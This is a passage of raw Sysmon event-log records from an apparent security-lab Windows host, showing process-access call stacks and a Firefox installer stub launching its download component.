Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.693{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.677{59A5CD1D-9451-6005-2505-00000000A301}63525472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Windows\SYSTEM32\ntdll.dll+70ead(wow64) 154100x800000000000000013935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.139{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe18.05FirefoxFirefoxMozilla7zS.sfx.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe" /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.iniC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=DB67C121EF802BE02DB5DF2C6205E32B,SHA256=72DA530C3BDD6142F8C29662BAC81AA6537C9B18289151E8D7F2318BFADCE6DD,IMPHASH=00000000000000000000000000000000{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe.\setup-stub.exe 10341000x800000000000000013934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program 